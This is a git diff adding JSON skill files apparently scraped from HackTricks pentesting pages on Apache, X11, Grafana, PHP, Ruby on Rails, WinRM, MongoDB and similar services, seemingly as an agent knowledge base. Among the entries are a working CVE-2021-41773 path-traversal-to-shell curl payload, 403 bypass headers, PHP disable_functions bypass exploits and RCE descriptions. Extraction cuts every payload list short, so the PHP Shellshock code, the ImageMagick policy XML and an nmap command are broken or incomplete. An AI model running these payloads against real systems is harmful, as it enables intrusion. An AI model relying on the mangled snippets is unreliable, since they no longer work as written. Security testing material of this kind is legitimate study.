+ "id": "network_services_pentesting_a5cab75c0ccc",
+ "category": "network-services-pentesting",
+ "title": "apache",
+ "description": "# Apache\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Executable PHP extensions\n\nCheck which extensions is executing the Apache server. To search them you can execute:\n\n```bash\n grep -R -B1 \"httpd-php\" /etc/apache2\n```\n\nAlso, some places where you can find this configuration is:\n\n```bash\n/etc/apache2/mods-available/php5.conf\n/etc/apache2/mods-enabled/php5.conf\n/etc/apache2/mods-available/php7.3.conf\n/etc/apache2/mods-enabled/php7.3.conf\n```\n\n## CVE-2021-41773\n\n```bash\ncurl http://172.1",
+ "payloads": [
+ "# Apache",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Executable PHP extensions",
+ "Check which extensions is executing the Apache server. To search them you can execute:",
+ "```bash",
+ "grep -R -B1 \"httpd-php\" /etc/apache2",
+ "Also, some places where you can find this configuration is:",
+ "```bash",
+ "/etc/apache2/mods-available/php5.conf",
+ "/etc/apache2/mods-enabled/php5.conf",
+ "/etc/apache2/mods-available/php7.3.conf",
+ "/etc/apache2/mods-enabled/php7.3.conf",
+ "## CVE-2021-41773",
+ "```bash",
+ "curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/apache.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_aa429786e14a.json b/skills/network_services_pentesting_aa429786e14a.json
new file mode 100644
index 0000000..1d76a54
--- /dev/null
+++ b/skills/network_services_pentesting_aa429786e14a.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_aa429786e14a",
+ "category": "network-services-pentesting",
+ "title": "6000 pentesting x11",
+ "description": "# 6000 - Pentesting X11\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\n**X Window System** (X) is a versatile windowing system prevalent on UNIX-based operating systems. It provides a framework for creating graphical **user interfaces (GUIs)**, with individual programs handling the user interface design. This flexibility allows for diverse and customizable experiences within the X environment.\n\n**Default port:** 6000\n\n```\nPORT STATE SERVICE\n6000/tcp open X11\n",
+ "payloads": [
+ "# 6000 - Pentesting X11",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "**X Window System** (X) is a versatile windowing system prevalent on UNIX-based operating systems. It provides a framework for creating graphical **user interfaces (GUIs)**, with individual programs handling the user interface design. This flexibility allows for diverse and customizable experiences within the X environment.",
+ "**Default port:** 6000",
+ "PORT STATE SERVICE",
+ "6000/tcp open X11",
+ "## Enumeration",
+ "Check for **anonymous connection:**",
+ "```bash",
+ "nmap -sV --script x11-access -p ",
+ "msf> use auxiliary/scanner/x11/open_x11",
+ "#### Local Enumeration",
+ "The file **`.Xauthority`** in the users home folder is **used** by **X11 for authorization**. From [**here**](https://stackoverflow.com/a/37367518):",
+ "```bash"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/6000-pentesting-x11.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_aadeefab4bc3.json b/skills/network_services_pentesting_aadeefab4bc3.json
new file mode 100644
index 0000000..bd4efab
--- /dev/null
+++ b/skills/network_services_pentesting_aadeefab4bc3.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_aadeefab4bc3",
+ "category": "network-services-pentesting",
+ "title": "403 and 401 bypasses",
+ "description": "# 403 & 401 Bypasses\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## HTTP Verbs/Methods Fuzzing\n\nTry using **different verbs** to access the file: `GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK`\n\n- Check the response headers, maybe some information can be given. For example, a **200 response** to **HEAD** with `Content-Length: 55` means that the **HEAD verb can access the info**. But you still need to find a way to exfiltrate that info.\n- Using a HTTP header",
+ "payloads": [
+ "# 403 & 401 Bypasses",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## HTTP Verbs/Methods Fuzzing",
+ "Try using **different verbs** to access the file: `GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK`",
+ "- Check the response headers, maybe some information can be given. For example, a **200 response** to **HEAD** with `Content-Length: 55` means that the **HEAD verb can access the info**. But you still need to find a way to exfiltrate that info.",
+ "- Using a HTTP header like `X-HTTP-Method-Override: PUT` can overwrite the verb used.",
+ "- Use **`TRACE`** verb and if you are very lucky maybe in the response you can see also the **headers added by intermediate proxies** that might be useful.",
+ "## HTTP Headers Fuzzing",
+ "- **Change Host header** to some arbitrary value ([that worked here](https://medium.com/@sechunter/exploiting-admin-panel-like-a-boss-fc2dd2499d31))",
+ "- Try to [**use other User Agents**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/User-Agents/UserAgents.fuzz.txt) to access the resource.",
+ "- **Fuzz HTTP Headers**: Try using HTTP Proxy **Headers**, HTTP Authentication Basic and NTLM brute-force (with a few combinations only) and other techniques. To do all of this I have created the tool [**fuzzhttpbypass**](https://github.com/carlospolop/fuzzhttpbypass).",
+ "- `X-Originating-IP: 127.0.0.1`",
+ "- `X-Forwarded-For: 127.0.0.1`",
+ "- `X-Forwarded: 127.0.0.1`",
+ "- `Forwarded-For: 127.0.0.1`"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_add33a3f9359.json b/skills/network_services_pentesting_add33a3f9359.json
new file mode 100644
index 0000000..fd1ccea
--- /dev/null
+++ b/skills/network_services_pentesting_add33a3f9359.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_add33a3f9359",
+ "category": "network-services-pentesting",
+ "title": "disable functions php 5.x shellshock exploit",
+ "description": "# PHP 5.x Shellshock Exploit\n\n{{#include ../../../../banners/hacktricks-training.md}}\n\nFrom [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)\n\n```php\n$tmp 2>&1\");",
+ "// In Safe Mode, the user may only alter environment variables whose names",
+ "// begin with the prefixes supplied by this directive.",
+ "// By default, users will only be able to set environment variables that",
+ "// begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,",
+ "// PHP will let the user modify ANY environment variable!",
+ "mail(\"a@127.0.0.1\",\"\",\"\",\"\",\"-bv\"); // -bv so we don't actually send any mail"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_ae51dde30222.json b/skills/network_services_pentesting_ae51dde30222.json
new file mode 100644
index 0000000..31b8ade
--- /dev/null
+++ b/skills/network_services_pentesting_ae51dde30222.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_ae51dde30222",
+ "category": "network-services-pentesting",
+ "title": "grafana",
+ "description": "# Grafana\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Interesting stuff\n\n- The file **`/etc/grafana/grafana.ini`** can contain sensitive information such as **admin** **username** and **password.**\n- Inside the platform you could **invite people** or **generate API keys** (might need to be admin)\n- You could check which plugins are installed (or even install new)\n- By default it uses **SQLite3** database in **`/var/lib/grafana/grafana.db`**\n - `select user,password,database from data",
+ "payloads": [
+ "# Grafana",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Interesting stuff",
+ "- The file **`/etc/grafana/grafana.ini`** can contain sensitive information such as **admin** **username** and **password.**",
+ "- Inside the platform you could **invite people** or **generate API keys** (might need to be admin)",
+ "- You could check which plugins are installed (or even install new)",
+ "- By default it uses **SQLite3** database in **`/var/lib/grafana/grafana.db`**",
+ "- `select user,password,database from data_source;`",
+ "## CVE-2024-9264 \u2013 SQL Expressions (DuckDB shellfs) post-auth RCE / LFI",
+ "Grafana\u2019s experimental SQL Expressions feature can evaluate DuckDB queries that embed user-controlled text. Insufficient sanitization allows attackers to chain DuckDB statements and load the community extension shellfs, which exposes shell commands via pipe-backed virtual files.",
+ "Impact",
+ "- Any authenticated user with VIEWER or higher can get code execution as the Grafana OS user (often grafana; sometimes root inside a container) or perform local file reads.",
+ "- Preconditions commonly met in real deployments:",
+ "- SQL Expressions enabled: `expressions.enabled = true`",
+ "- `duckdb` binary present in PATH on the server"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/grafana.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_af427fdf4051.json b/skills/network_services_pentesting_af427fdf4051.json
new file mode 100644
index 0000000..cbe9f2d
--- /dev/null
+++ b/skills/network_services_pentesting_af427fdf4051.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_af427fdf4051",
+ "category": "network-services-pentesting",
+ "title": "44134 pentesting tiller helm",
+ "description": "# 44134 Tiller / Helm\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nHelm is the **package manager** for Kubernetes. It allows to package YAML files and distribute them in public and private repositories. These packages are called **Helm Charts**. **Tiller** is the **service** **running** by default in the port 44134 offering the service.\n\n**Default port:** 44134\n\n```\nPORT STATE SERVICE VERSION\n44134/tcp open unknown\n```\n\n## Enumeration\n\nIf you can **enumerate pods ",
+ "payloads": [
+ "# 44134 Tiller / Helm",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "Helm is the **package manager** for Kubernetes. It allows to package YAML files and distribute them in public and private repositories. These packages are called **Helm Charts**. **Tiller** is the **service** **running** by default in the port 44134 offering the service.",
+ "**Default port:** 44134",
+ "PORT STATE SERVICE VERSION",
+ "44134/tcp open unknown",
+ "## Enumeration",
+ "If you can **enumerate pods and/or services** of different namespaces enumerate them and search for the ones with **\"tiller\" in their name**:",
+ "```bash",
+ "kubectl get pods | grep -i \"tiller\"",
+ "kubectl get services | grep -i \"tiller\"",
+ "kubectl get pods -n kube-system | grep -i \"tiller\"",
+ "kubectl get services -n kube-system | grep -i \"tiller\"",
+ "kubectl get pods -n | grep -i \"tiller\""
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/44134-pentesting-tiller-helm.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_b0e3c1e64482.json b/skills/network_services_pentesting_b0e3c1e64482.json
new file mode 100644
index 0000000..5eac61d
--- /dev/null
+++ b/skills/network_services_pentesting_b0e3c1e64482.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_b0e3c1e64482",
+ "category": "network-services-pentesting",
+ "title": "python",
+ "description": "# Python\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Server using python\n\ntest a possible **code execution**, using the function _str()_:\n\n```python\n\"+str(True)+\" #If the string True is printed, then it is vulnerable\n```\n\n### Tricks\n\n\n{{#ref}}\n../../generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md\n{{#endref}}\n\n\n{{#ref}}\n../../pentesting-web/ssti-server-side-template-injection/README.md\n{{#endref}}\n\n\n{{#ref}}\n../../pentesting-web/deserialization/README.md\n{{",
+ "payloads": [
+ "# Python",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Server using python",
+ "test a possible **code execution**, using the function _str()_:",
+ "```python",
+ "\"+str(True)+\" #If the string True is printed, then it is vulnerable",
+ "### Tricks",
+ "{{#ref}}",
+ "../../generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md",
+ "{{#endref}}",
+ "{{#ref}}",
+ "../../pentesting-web/ssti-server-side-template-injection/README.md",
+ "{{#endref}}",
+ "{{#ref}}",
+ "../../pentesting-web/deserialization/README.md"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/python.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_b47b830439fd.json b/skills/network_services_pentesting_b47b830439fd.json
new file mode 100644
index 0000000..386ae21
--- /dev/null
+++ b/skills/network_services_pentesting_b47b830439fd.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_b47b830439fd",
+ "category": "network-services-pentesting",
+ "title": "ruby tricks",
+ "description": "# Ruby Tricks\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## File upload to RCE\n\nAs explained in [this article](https://www.offsec.com/blog/cve-2024-46986/), uploading a `.rb` file into sensitive directories such as `config/initializers/` can lead to remote code execution (RCE) in Ruby on Rails applications.\n\nTips:\n- Other boot/eager-load locations that are executed on app start are also risky when writeable (e.g., `config/initializers/` is the classic one). If you find an arbitrary file",
+ "payloads": [
+ "# Ruby Tricks",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## File upload to RCE",
+ "As explained in [this article](https://www.offsec.com/blog/cve-2024-46986/), uploading a `.rb` file into sensitive directories such as `config/initializers/` can lead to remote code execution (RCE) in Ruby on Rails applications.",
+ "- Other boot/eager-load locations that are executed on app start are also risky when writeable (e.g., `config/initializers/` is the classic one). If you find an arbitrary file upload that lands anywhere under `config/` and is later evaluated/required, you may obtain RCE at boot.",
+ "- Look for dev/staging builds that copy user-controlled files into the container image where Rails will load them on boot.",
+ "## Active Storage image transformation \u2192 command execution (CVE-2025-24293)",
+ "When an application uses Active Storage with `image_processing` + `mini_magick`, and passes untrusted parameters to image transformation methods, Rails versions prior to 7.1.5.2 / 7.2.2.2 / 8.0.2.1 could allow command injection because some transformation methods were mistakenly allowed by default.",
+ "- A vulnerable pattern looks like:",
+ "```erb",
+ "<%= image_tag blob.variant(params[:t] => params[:v]) %>",
+ "where `params[:t]` and/or `params[:v]` are attacker-controlled.",
+ "- What to try during testing",
+ "- Identify any endpoints that accept variant/processing options, transformation names, or arbitrary ImageMagick arguments.",
+ "- Fuzz `params[:t]` and `params[:v]` for suspicious errors or execution side-effects. If you can influence the method name or pass raw arguments that reach MiniMagick, you may get code exec on the image processor host."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/ruby-tricks.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_b531fcb9bc7f.json b/skills/network_services_pentesting_b531fcb9bc7f.json
new file mode 100644
index 0000000..04fd46b
--- /dev/null
+++ b/skills/network_services_pentesting_b531fcb9bc7f.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_b531fcb9bc7f",
+ "category": "network-services-pentesting",
+ "title": "5985 5986 pentesting winrm",
+ "description": "# 5985,5986 - Pentesting WinRM\n\n{{#include ../banners/hacktricks-training.md}}\n\n## WinRM\n\n[Windows Remote Management (WinRM)]() is highlighted as a **protocol by Microsoft** that enables the **remote management of Windows systems** through HTTP(S), leveraging SOAP in the process. It's fundamentally powered by WMI, presenting itself as an HTTP-based interface for WMI operations.\n\nThe presence of WinRM on a machine al",
+ "payloads": [
+ "# 5985,5986 - Pentesting WinRM",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## WinRM",
+ "[Windows Remote Management (WinRM)]() is highlighted as a **protocol by Microsoft** that enables the **remote management of Windows systems** through HTTP(S), leveraging SOAP in the process. It's fundamentally powered by WMI, presenting itself as an HTTP-based interface for WMI operations.",
+ "The presence of WinRM on a machine allows for straightforward remote administration via PowerShell, akin to how SSH works for other operating systems. To determine if WinRM is operational, checking for the opening of specific ports is recommended:",
+ "- **5985/tcp (HTTP)**",
+ "- **5986/tcp (HTTPS)**",
+ "An open port from the list above signifies that WinRM has been set up, thus permitting attempts to initiate a remote session.",
+ "### **Initiating a WinRM Session**",
+ "To configure PowerShell for WinRM, Microsoft's `Enable-PSRemoting` cmdlet comes into play, setting up the computer to accept remote PowerShell commands. With elevated PowerShell access, the following commands can be executed to enable this functionality and designate any host as trusted:",
+ "```bash",
+ "Enable-PSRemoting -Force",
+ "Set-Item wsman:\\localhost\\client\\trustedhosts *",
+ "This approach involves adding a wildcard to the `trustedhosts` configuration, a step that requires cautious consideration due to its implications. It's also noted that altering the network type from \"Public\" to \"Work\" might be necessary on the attacker's machine.",
+ "Moreover, WinRM can be **activated remotely** using the `wmic` command, demonstrated as follows:"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/5985-5986-pentesting-winrm.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_b89d59b3c436.json b/skills/network_services_pentesting_b89d59b3c436.json
new file mode 100644
index 0000000..7b638f8
--- /dev/null
+++ b/skills/network_services_pentesting_b89d59b3c436.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_b89d59b3c436",
+ "category": "network-services-pentesting",
+ "title": "pentesting 264 check point firewall 1",
+ "description": "# # 264/tcp - Pentesting Check Point Firewall\n\n{{#include ../banners/hacktricks-training.md}}\n\nIt's possible to interact with **CheckPoint** **Firewall-1** firewalls to discover valuable information such as the firewall's name and the management station's name. This can be done by sending a query to the port **264/TCP**.\n\n## Obtaining Firewall and Management Station Names\n\nUsing a pre-authentication request, you can execute a module that targets the **CheckPoint Firewall-1**. The necessary comma",
+ "payloads": [
+ "# # 264/tcp - Pentesting Check Point Firewall",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "It's possible to interact with **CheckPoint** **Firewall-1** firewalls to discover valuable information such as the firewall's name and the management station's name. This can be done by sending a query to the port **264/TCP**.",
+ "## Obtaining Firewall and Management Station Names",
+ "Using a pre-authentication request, you can execute a module that targets the **CheckPoint Firewall-1**. The necessary commands for this operation are outlined below:",
+ "```bash",
+ "use auxiliary/gather/checkpoint_hostname",
+ "set RHOST 10.10.10.10",
+ "Upon execution, the module attempts to contact the firewall's SecuRemote Topology service. If successful, it confirms the presence of a CheckPoint Firewall and retrieves the names of both the firewall and the SmartCenter management host. Here's an example of what the output might look like:",
+ "```text",
+ "[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service...",
+ "[+] Appears to be a CheckPoint Firewall...",
+ "[+] Firewall Host: FIREFIGHTER-SEC",
+ "[+] SmartCenter Host: FIREFIGHTER-MGMT.example.com",
+ "[*] Auxiliary module execution completed"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-264-check-point-firewall-1.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_b8a4582bfee7.json b/skills/network_services_pentesting_b8a4582bfee7.json
new file mode 100644
index 0000000..0d73244
--- /dev/null
+++ b/skills/network_services_pentesting_b8a4582bfee7.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_b8a4582bfee7",
+ "category": "network-services-pentesting",
+ "title": "nextjs",
+ "description": "# NextJS\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## General Architecture of a Next.js Application\n\n### Typical File Structure\n\nA standard Next.js project follows a specific file and directory structure that facilitates its features like routing, API endpoints, and static asset management. Here's a typical layout:\n\n```lua\nmy-nextjs-app/\n\u251c\u2500\u2500 node_modules/\n\u251c\u2500\u2500 public/\n\u2502 \u251c\u2500\u2500 images/\n\u2502 \u2502 \u2514\u2500\u2500 logo.png\n\u2502 \u2514\u2500\u2500 favicon.ico\n\u251c\u2500\u2500 app/\n\u2502 \u251c\u2500\u2500 api/\n\u2502 \u2502 \u2514\u2500\u2500 hello/\n\u2502 \u2502 \u2514\u2500\u2500 route.",
+ "payloads": [
+ "# NextJS",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## General Architecture of a Next.js Application",
+ "### Typical File Structure",
+ "A standard Next.js project follows a specific file and directory structure that facilitates its features like routing, API endpoints, and static asset management. Here's a typical layout:",
+ "```lua",
+ "my-nextjs-app/",
+ "\u251c\u2500\u2500 node_modules/",
+ "\u251c\u2500\u2500 public/",
+ "\u2502 \u251c\u2500\u2500 images/",
+ "\u2502 \u2502 \u2514\u2500\u2500 logo.png",
+ "\u2502 \u2514\u2500\u2500 favicon.ico",
+ "\u251c\u2500\u2500 app/",
+ "\u2502 \u251c\u2500\u2500 api/",
+ "\u2502 \u2502 \u2514\u2500\u2500 hello/"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/nextjs.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_ba6fe94dbf13.json b/skills/network_services_pentesting_ba6fe94dbf13.json
new file mode 100644
index 0000000..4fa50b0
--- /dev/null
+++ b/skills/network_services_pentesting_ba6fe94dbf13.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_ba6fe94dbf13",
+ "category": "network-services-pentesting",
+ "title": "pentesting 631 internet printing protocol ipp",
+ "description": "# Internet Printing Protocol\n\n{{#include ../banners/hacktricks-training.md}}\n\nThe **Internet Printing Protocol (IPP)**, as specified in **RFC 2910** and **RFC 2911**, is the de-facto standard for network printing. It sits on top of **HTTP/1.1** (either clear-text or TLS) and exposes a rich API for creating print jobs, querying printer capabilities and managing queues. Modern extensions such as **IPP Everywhere** even allow driver-less printing from mobile and cloud environments, while the same p",
+ "payloads": [
+ "# Internet Printing Protocol",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "The **Internet Printing Protocol (IPP)**, as specified in **RFC 2910** and **RFC 2911**, is the de-facto standard for network printing. It sits on top of **HTTP/1.1** (either clear-text or TLS) and exposes a rich API for creating print jobs, querying printer capabilities and managing queues. Modern extensions such as **IPP Everywhere** even allow driver-less printing from mobile and cloud environments, while the same packet format has been reused for 3-D printers.",
+ "Unfortunately, exposing port **631/tcp (and 631/udp for printer discovery)** often leads to serious security issues \u2013 both on traditional office printers and on any Linux/Unix host running **CUPS**.",
+ "## Quick PoC \u2013 crafting raw IPP with Python",
+ "```python",
+ "import struct, requests",
+ "# Minimal IPP Get-Printer-Attributes request (operation-id 0x000B)",
+ "ipp = struct.pack(",
+ "\">IHHIHH\", # version 2.0, operation-id, request-id",
+ "0x0200, # 2.0",
+ "0x000B, # Get-Printer-Attributes",
+ "0x00000001, # request-id",
+ "0x01, 0x47, # operation-attributes-tag, charset attr (skipped)",
+ ") + b\"\\x03\" # end-of-attributes"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_bd8729bd982f.json b/skills/network_services_pentesting_bd8729bd982f.json
new file mode 100644
index 0000000..6a084ea
--- /dev/null
+++ b/skills/network_services_pentesting_bd8729bd982f.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_bd8729bd982f",
+ "category": "network-services-pentesting",
+ "title": "8089 splunkd",
+ "description": "# 8089 - Pentesting Splunkd\n\n{{#include ../banners/hacktricks-training.md}}\n\n## **Basic Information**\n\n- Log analytics tool used for data gathering, analysis, and visualization\n- Commonly used in security monitoring and business analytics\n- Default ports:\n - Web server: 8000\n - Splunkd service: 8089\n\n### Vulnerability Vectors:\n\n1. Free Version Exploitation\n\n- Trial version automatically converts to free version after 60 days\n- Free version lacks authentication\n- Potential security risk if left",
+ "payloads": [
+ "# 8089 - Pentesting Splunkd",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## **Basic Information**",
+ "- Log analytics tool used for data gathering, analysis, and visualization",
+ "- Commonly used in security monitoring and business analytics",
+ "- Default ports:",
+ "- Web server: 8000",
+ "- Splunkd service: 8089",
+ "### Vulnerability Vectors:",
+ "1. Free Version Exploitation",
+ "- Trial version automatically converts to free version after 60 days",
+ "- Free version lacks authentication",
+ "- Potential security risk if left unmanaged",
+ "- Administrators may overlook security implications",
+ "2. Credential Weaknesses"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/8089-splunkd.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_be0b467b5fb5.json b/skills/network_services_pentesting_be0b467b5fb5.json
new file mode 100644
index 0000000..341a5f7
--- /dev/null
+++ b/skills/network_services_pentesting_be0b467b5fb5.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_be0b467b5fb5",
+ "category": "network-services-pentesting",
+ "title": "27017 27018 mongodb",
+ "description": "# 27017,27018 - Pentesting MongoDB\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\n**MongoDB** is an **open source** database management system that uses a **document-oriented database model** to handle diverse forms of data. It offers flexibility and scalability for managing unstructured or semi-structured data in applications like big data analytics and content management. **Default port:** 27017, 27018\n\n```\nPORT STATE SERVICE VERSION\n27017/tcp open mongodb MongoDB",
+ "payloads": [
+ "# 27017,27018 - Pentesting MongoDB",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "**MongoDB** is an **open source** database management system that uses a **document-oriented database model** to handle diverse forms of data. It offers flexibility and scalability for managing unstructured or semi-structured data in applications like big data analytics and content management. **Default port:** 27017, 27018",
+ "PORT STATE SERVICE VERSION",
+ "27017/tcp open mongodb MongoDB 2.6.9 2.6.9",
+ "## Enumeration",
+ "### Manual",
+ "```python",
+ "from pymongo import MongoClient",
+ "client = MongoClient(host, port, username=username, password=password)",
+ "client.server_info() #Basic info",
+ "#If you have admin access you can obtain more info",
+ "admin = client.admin",
+ "admin_info = admin.command(\"serverStatus\")"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/27017-27018-mongodb.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_bee51b598da7.json b/skills/network_services_pentesting_bee51b598da7.json
new file mode 100644
index 0000000..1160052
--- /dev/null
+++ b/skills/network_services_pentesting_bee51b598da7.json
@@ -0,0 +1,18 @@
+{
+ "id": "network_services_pentesting_bee51b598da7",
+ "category": "network-services-pentesting",
+ "title": "disable functions bypass php 5.2 fopen exploit",
+ "description": "# PHP 5.2 - FOpen Exploit\n\n{{#include ../../../../banners/hacktricks-training.md}}\n\n\nFrom [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)\n\n```php\nphp -r 'fopen(\"srpath://../../../../../../../dir/pliczek\", \"a\");'\n```\n\n{{#include ../../../../banners/hacktricks-training.md}}\n\n\n\n",
+ "payloads": [
+ "# PHP 5.2 - FOpen Exploit",
+ "{{#include ../../../../banners/hacktricks-training.md}}",
+ "From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)",
+ "```php",
+ "php -r 'fopen(\"srpath://../../../../../../../dir/pliczek\", \"a\");'",
+ "{{#include ../../../../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_c00182d513b2.json b/skills/network_services_pentesting_c00182d513b2.json
new file mode 100644
index 0000000..7fb1bc4
--- /dev/null
+++ b/skills/network_services_pentesting_c00182d513b2.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_c00182d513b2",
+ "category": "network-services-pentesting",
+ "title": "imagemagick security",
+ "description": "# ImageMagick Security\n\n{{#include ../../banners/hacktricks-training.md}}\n\nCheck further details in [**https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html**](https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html)\n\nImageMagick, a versatile image processing library, presents a challenge in configuring its security policy due to its extensive options and lack of detailed online documentation. Users often create policies based on fragmented inter",
+ "payloads": [
+ "# ImageMagick Security",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "Check further details in [**https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html**](https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html)",
+ "ImageMagick, a versatile image processing library, presents a challenge in configuring its security policy due to its extensive options and lack of detailed online documentation. Users often create policies based on fragmented internet sources, leading to potential misconfigurations. The library supports a vast array of over 100 image formats, each contributing to its complexity and vulnerability profile, as demonstrated by historical security incidents.",
+ "## Towards Safer Policies",
+ "To address these challenges, a [tool has been developed](https://imagemagick-secevaluator.doyensec.com/) to aid in designing and auditing ImageMagick's security policies. This tool is rooted in extensive research and aims to ensure policies are not only robust but also free from loopholes that could be exploited.",
+ "## Allowlist vs Denylist Approach",
+ "Historically, ImageMagick policies relied on a denylist approach, where specific coders were denied access. However, changes in ImageMagick 6.9.7-7 shifted this paradigm, enabling an allowlist approach. This approach first denies all coders and then selectively grants access to trusted ones, enhancing the security posture.",
+ "```xml",
+ "",
+ "",
+ "## Case Sensitivity in Policies",
+ "It's crucial to note that policy patterns in ImageMagick are case sensitive. As such, ensuring that coders and modules are correctly upper-cased in policies is vital to prevent unintended permissions.",
+ "## Resource Limits",
+ "ImageMagick is prone to denial of service attacks if not properly configured. Setting explicit resource limits in the policy is essential to prevent such vulnerabilities."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/imagemagick-security.md"
+ ]
+}
\ No newline at end of file
